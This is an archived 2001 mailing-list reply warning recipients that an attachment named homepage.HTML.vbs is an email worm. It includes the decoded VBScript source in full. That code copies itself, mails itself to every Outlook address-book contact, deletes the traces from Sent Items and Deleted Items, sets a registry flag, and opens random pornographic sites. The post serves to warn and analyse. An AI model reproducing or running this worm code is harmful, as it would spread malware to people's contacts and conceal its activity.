[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Homepage [VIRUS!!!]
From: |
Avi Green |
Subject: |
Re: Homepage [VIRUS!!!] |
Date: |
Wed, 09 May 2001 12:19:47 -0400 |
Patrice GUERLAIS wrote:
>
> Hi!
>
> You've got to see this page! It's really cool ;O)
>
> ------------------------------------------------------------------------
> Name: homepage.HTML.vbs
> homepage.HTML.vbs Type: MPEG Video (video/mpeg)
> Encoding: quoted-printable
WATCH OUT, this is a VBS worm that's exploiting your addressbook,
Patrice.
Don't launch that attachment if you're on a Windows machine or have
Microsoft Outlook installed.
I've decoded the worm and attached a copy of the worm source code
("worm.vbs.txt") as well as the program I wrote to decode it
("homepage.HTML.pl") and the encrypted source code ("coded_worm.dat").
I added the ".txt" extension to "worm.vbs" so no one accidentally
launches it!
--Avi
======================================================
= Avi Green :-) avi at sputnik7.com (-: 212 217-1147 =
======== Unix SysAdmin & System Specialist =========
http://www.sputnik7.com - chronic online entertainment
http://www.epitonic.com - Hi Quality Free MP3 Music
http://www.res.com - The Future of Filmmaking
http://www.we-deliver.tv - Log on, order in, smoke out
the best grasses for the online masses
n Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)
Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop
Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing
If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If
Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next
Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If
Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Mapi=Outlook.GetNameSpace("MAPI")
Set Lists=Mapi.AddressLists
For Each ListIndex In Lists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCount = ListIndex.AddressEntries.Count
For Count= 1 To ContactCount
Set Mail = Outlook.CreateItem(0)
Set Contact = ListIndex.AddressEntries(Count)
Mail.To = Contact.Address
Mail.Subject = "Homepage"
Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
Set Attachment=Mail.Attachments
Attachment.Add Folder & "\homepage.HTML.vbs"
Mail.DeleteAfterSubmit = True
If Mail.To <> "" Then
Mail.Send
WS.regwrite "HKCU\software\An\mailed", "1"
End If
Next
End If
Next
End if
End Functionรพ
homepage.HTML.pl
Description: Perl program
coded_worm.dat
Description: Binary data